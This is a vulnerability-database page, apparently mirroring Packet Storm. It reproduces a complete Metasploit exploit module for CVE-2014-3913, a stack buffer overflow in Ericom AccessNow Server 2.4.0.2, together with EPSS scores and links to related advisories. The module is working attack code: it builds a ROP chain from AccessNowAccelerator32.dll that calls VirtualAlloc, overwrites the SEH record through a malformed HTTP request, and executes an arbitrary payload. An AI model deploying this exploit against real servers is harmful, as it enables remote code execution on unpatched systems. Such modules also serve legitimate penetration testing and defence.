Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormJuan vazquezPACKETSTORM:127152
HistoryJun 19, 2014 - 12:00 a.m.

Ericom AccessNow Server Buffer Overflow

2014-06-1900:00:00
juan vazquez
packetstormsecurity.com
21

EPSS

0.877

Percentile

98.7%

JSON
`##  
# This module requires Metasploit: http//metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = NormalRanking  
  
include Msf::Exploit::Remote::HttpClient  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Ericom AccessNow Server Buffer Overflow',  
'Description' => %q{  
This module exploits a stack based buffer overflow in Ericom AccessNow Server. The  
vulnerability is due to an insecure usage of vsprintf with user controlled data,  
which can be triggered with a malformed HTTP request. This module has been tested  
successfully with Ericom AccessNow Server 2.4.0.2 on Windows XP SP3 and Windows 2003  
Server SP2.  
},  
'Author' =>  
[  
'Unknown', # Vulnerability Discovery  
'juan vazquez', # Metasploit Module  
],  
'References' =>  
[  
['ZDI', '14-160'],  
['CVE', '2014-3913'],  
['BID', '67777'],  
['URL','http://www.ericom.com/security-ERM-2014-610.asp']  
],  
'Privileged' => true,  
'Platform' => 'win',  
'Arch' => ARCH_X86,  
'Payload' =>  
{  
'Space' => 4096,  
'BadChars' => "\x00\x0d\x0a",  
'DisableNops' => true,  
'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500  
},  
'Targets' =>  
[  
[ 'Ericom AccessNow Server 2.4.0.2 / Windows [XP SP3 / 2003 SP2]',  
{  
'RopOffset' => 62,  
'Offset' => 30668,  
'Ret' => 0x104da1e5 # 0x104da1e5 {pivot 1200 / 0x4b0} # ADD ESP,4B0 # RETN # From AccessNowAccelerator32.dll  
}  
]  
],  
'DisclosureDate' => 'Jun 2 2014',  
'DefaultTarget' => 0))  
  
register_options([Opt::RPORT(8080)], self.class)  
end  
  
  
def check  
res = send_request_cgi({  
'uri' => '/AccessNow/start.html'  
})  
  
unless res && res.code == 200 && res.headers['Server']  
return Exploit::CheckCode::Safe  
end  
  
if res.headers['Server'] =~ /Ericom AccessNow Server/  
return Exploit::CheckCode::Appears # Ericom AccessNow 2.4  
elsif res && res.code == 200 && res.headers['Server'] && res.headers['Server'] =~ /Ericom Access Server/  
return Exploit::CheckCode::Detected # Ericom AccessNow 3  
end  
  
Exploit::CheckCode::Unknown  
end  
  
def exploit_uri  
uri = "#{rand_text_alpha(1)} " # To ensure a "malformed request" error message  
uri << rand_text(target['RopOffset'])  
uri << create_rop_chain  
uri << payload.encoded  
uri << rand_text(target['Offset'] - uri.length)  
uri << rand_text(4) # nseh  
uri << [target.ret].pack("V") # seh  
  
uri  
end  
  
def exploit  
print_status("#{peer} - Sending malformed request...")  
send_request_raw({  
'method' => 'GET',  
'uri' => exploit_uri,  
'encode' => false  
}, 1)  
end  
  
def create_rop_chain  
# rop chain generated with mona.py - www.corelan.be  
rop_gadgets =  
[  
0x10518867, # RETN # [AccessNowAccelerator32.dll] # Padding to ensure it works in both windows 2003 SP2 and XP SP3  
0x10518867, # RETN # [AccessNowAccelerator32.dll] # Padding to ensure it works in both windows 2003 SP2 and XP SP3  
0x10518866, # POP EAX # RETN [AccessNowAccelerator32.dll]  
0x105c6294, # ptr to &VirtualAlloc() [IAT AccessNowAccelerator32.dll]  
0x101f292b, # MOV EAX,DWORD PTR DS:[EAX] # RETN [AccessNowAccelerator32.dll]  
0x101017e6, # XCHG EAX,ESI # RETN [AccessNowAccelerator32.dll]  
0x103ba89c, # POP EBP # RETN [AccessNowAccelerator32.dll]  
0x103eed74, # & jmp esp [AccessNowAccelerator32.dll]  
0x1055dac2, # POP EAX # RETN [AccessNowAccelerator32.dll]  
0xffffffff, # Value to negate, will become 0x00000001  
0x1052f511, # NEG EAX # RETN [AccessNowAccelerator32.dll]  
0x10065f69, # XCHG EAX,EBX # RETN [AccessNowAccelerator32.dll]  
0x10074429, # POP EAX # RETN [AccessNowAccelerator32.dll]  
0xfbdbcb75, # put delta into eax (-> put 0x00001000 into edx)  
0x10541810, # ADD EAX,424448B # RETN [AccessNowAccelerator32.dll]  
0x1038e58a, # XCHG EAX,EDX # RETN [AccessNowAccelerator32.dll]  
0x1055d604, # POP EAX # RETN [AccessNowAccelerator32.dll]  
0xffffffc0, # Value to negate, will become 0x00000040  
0x10528db3, # NEG EAX # RETN [AccessNowAccelerator32.dll]  
0x1057555d, # XCHG EAX,ECX # RETN [AccessNowAccelerator32.dll]  
0x1045fd24, # POP EDI # RETN [AccessNowAccelerator32.dll]  
0x10374022, # RETN (ROP NOP) [AccessNowAccelerator32.dll]  
0x101f25d4, # POP EAX # RETN [AccessNowAccelerator32.dll]  
0x90909090, # nop  
0x1052cfce # PUSHAD # RETN [AccessNowAccelerator32.dll]  
].pack("V*")  
  
rop_gadgets  
end  
  
end  
`

Related

prion 1
nvd 1
exploitdb 1
cvelist 1
nessus 1
metasploit 1
zdi 1
cve 1
kaspersky 1
checkpoint_advisories 1
zdt 1
prion
prion
Stack overflow
2014-06-04 14:55:00
nvd
nvd
CVE-2014-3913
2014-06-04 14:55:05
exploitdb
exploitdb
Ericom AccessNow Server - Remote Buffer Overflow (Metasploit)
2014-06-19 00:00:00
cvelist
cvelist
CVE-2014-3913
2014-06-04 14:00:00
nessus
nessus
Ericom AccessNow Server < 3.3.1.4095 Stack-Based Buffer Overflow
2014-06-30 00:00:00
metasploit
metasploit
Ericom AccessNow Server Buffer Overflow
2014-06-17 19:21:49
zdi
zdi
(0Day) Ericom AccessNow Server Stack Buffer Overflow Remote Code Execution Vulnerability
2014-06-02 00:00:00
cve
cve
CVE-2014-3913
2014-06-04 14:55:05
kaspersky
kaspersky
KLA10149 ACE vulnerability in Ericom
2014-06-04 00:00:00
checkpoint_advisories
checkpoint_advisories
Ericom AccessNow Server Stack Buffer Overflow (CVE-2014-3913)
2014-07-07 00:00:00
zdt
zdt
Ericom AccessNow Server Buffer Overflow Exploit
2014-06-19 00:00:00

EPSS

0.877

Percentile

98.7%

JSON
Related for PACKETSTORM:127152
prion1nvd1exploitdb1cvelist1nessus1metasploit1zdi1cve1kaspersky1checkpoint_advisories1zdt1